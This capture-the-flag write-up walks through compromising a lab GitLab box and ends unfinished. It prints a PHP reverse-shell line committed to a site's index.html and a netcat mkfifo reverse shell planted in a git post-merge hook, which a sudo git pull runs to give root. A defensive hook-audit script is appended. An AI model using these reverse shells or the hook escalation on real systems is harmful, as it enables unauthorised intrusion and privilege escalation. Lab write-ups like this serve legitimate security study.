Beginning with a simple scan of the first 10000 ports
Nothing crazy. We see a web server, we go on the web. It is a gitlab server.
Normally I would run gobuster on it, but I wanted to explore the site manually. At the bottom of the site I clicked on the help link and another link showed up, which in turn led to a list of links.
After login, we have two projects to explore. The Deployer project didn't interest me as much as the Profile project, which appears to be the source code of the developer's website. The first thing I did was add a PHP reverse shell at the bottom of index.html, then commit the change and merge it to master:

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.32/1234 0>&1'");
```
Visiting [http://10.10.10.114/profile](http://10.10.10.114/profile) activates the shell.
I like to check whether my current user can run any command as root or as another user. In our case, www-data can run sudo git pull.
I have been working with GitLab for a while now, and that is how I got to know about git hooks. Git hooks are scripts that git executes at certain points, depending on which git command you ran; post-merge and pre-commit are two examples among many. Take a look at this article and this one if you are interested in learning more. The exploit I used was similar to a project I was working on when learning about git; here is the link to it.
For this box, I used post-merge for my attack. The post-merge hook runs after a git merge has completed, and since git pull is a fetch followed by a merge, a pull triggers it too.
Start by copying the .git directory from /var/www/html/profile to /tmp/. Now we echo a netcat reverse shell into the post-merge hook in /tmp/.git/hooks. Next, we make a change to README.md on the web server and merge the change. In your shell, run sudo git pull and that should give a root shell (make sure you are listening). The snippet below is exactly what was just explained in words:

```console
www-data@bitlab:/var/www/html/profile$ cp -R .git /tmp/
www-data@bitlab:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 1337 >/tmp/f" > .git/hooks/post-merge
www-data@bitlab:/tmp$ chmod 777 .git/hooks/post-merge
# Make a change to README.md on the web
www-data@bitlab:/tmp$ sudo /usr/bin/git pull
```
Here’s our listener with a root shell.
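From the defender's side, the thing to audit is exactly what made this work: hooks that will run on the next pull or merge, and hook files that a low-privilege user can write to. The POSIX sh script below is an added example, not from this writeup or the box; the repository paths and the audit_hooks.sh file name are assumptions, and the test data it is exercised with is constructed.

```shell
#!/bin/sh
# Added example: audit a checkout for git hooks that would fire on the next
# pull/merge, and for hook files writable by "other". Hooks run with the
# privileges of whoever runs git, which is what a sudo rule for git exposes.

# Print every executable, non-*.sample hook under <repo>/.git/hooks, or under
# core.hooksPath when git is installed and that setting is present.
find_active_hooks() {
  repo="$1"
  hooks_dir="$repo/.git/hooks"
  if command -v git >/dev/null 2>&1; then
    custom=$(git -C "$repo" config --get core.hooksPath 2>/dev/null || true)
    if [ -n "$custom" ]; then
      # A relative core.hooksPath is resolved against the working tree.
      case "$custom" in /*) hooks_dir="$custom" ;; *) hooks_dir="$repo/$custom" ;; esac
    fi
  fi
  [ -d "$hooks_dir" ] || return 0
  for h in "$hooks_dir"/*; do
    [ -f "$h" ] || continue
    case "$h" in *.sample) continue ;; esac
    if [ -x "$h" ]; then printf '%s\n' "$h"; fi
  done
  return 0
}

# Print the hooks directory and any hook file that is world-writable (o+w),
# i.e. anything an unprivileged user could overwrite or drop a hook into.
find_writable_hooks() {
  hooks_dir="$1/.git/hooks"
  [ -d "$hooks_dir" ] || return 0
  find "$hooks_dir" -perm -002 -print | sort
  return 0
}

# Usage (assumed file name): sh audit_hooks.sh /var/www/html/profile
if [ -n "$1" ]; then
  echo "Active hooks:";         find_active_hooks "$1"
  echo "World-writable hooks:"; find_writable_hooks "$1"
fi
```

A clean result is an empty list for both; any non-sample executable hook in a tree that a privileged account pulls from deserves a look at who last wrote it.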
Obviously this is an unintended path (jumping straight from www-data to root). I believe the intended way is to find credentials for the SQL database to get the user's password, and from there …(come back)